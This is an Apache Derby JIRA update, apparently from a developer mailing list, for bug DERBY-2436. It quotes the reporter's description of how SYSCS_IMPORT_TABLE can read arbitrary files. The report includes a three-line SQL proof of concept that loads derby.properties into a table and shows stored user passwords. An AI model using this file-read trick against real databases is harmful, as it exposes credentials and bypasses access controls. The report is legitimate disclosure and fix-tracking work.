You are viewing a plain text version of this content. The canonical link for it is here.

Posted to derby-dev@db.apache.org by "Kathey Marsden (JIRA)" <ji...@apache.org> on 2012/09/26 22:01:09 UTC

[jira] [Updated] (DERBY-2436) SYSCS_IMPORT_TABLE can be used to read derby files

     [ https://issues.apache.org/jira/browse/DERBY-2436?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Kathey Marsden updated DERBY-2436:
----------------------------------

    Issue & fix info:   (was: High Value Fix)
              Labels: derby_triage10_10 derby_triage10_5_2  (was: derby_triage10_5_2)

Taking off the High Value Fix list.  A good way to fix this without compatibility issues has not presented itself.
                
> SYSCS_IMPORT_TABLE can be used to read derby files
> --------------------------------------------------
>
>                 Key: DERBY-2436
>                 URL: https://issues.apache.org/jira/browse/DERBY-2436
>             Project: Derby
>          Issue Type: Bug
>          Components: Tools
>    Affects Versions: 10.1.2.1, 10.2.1.6, 10.3.1.4
>            Reporter: Daniel John Debrunner
>            Priority: Critical
>              Labels: derby_triage10_10, derby_triage10_5_2
>
> There are no controls over which files SYSCS_IMPORT_TABLE can read, thus allowing any user that has permission to execute the procedure to try and access information that they have no permissions to do so. E.g. even with the secure-by-default network server I can execute three lines of SQL to view to contents of derby.properties, thus seeing passwords of other users, or the address of the ldap server.
> create table t (c varchar(32000));
> CALL SYSCS_UTIL.SYSCS_IMPORT_TABLE(NULL, 'T', 'derby.properties', NULL, NULL, 'ISO8859_1', 0);
> ij> select * from T;
> C
> ----------------------------------------------
> derby.connection.requireAuthentication=true
> derby.authentication.provider=BUILTIN
> derby.user.SA=sapwd
> derby.user.MARY=marypwd
> Also a similar trick could be attempted against the actual data files, allowing a user to attempt to bypass grant/revoke security, especially no that binary data can be exported/imported.

--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira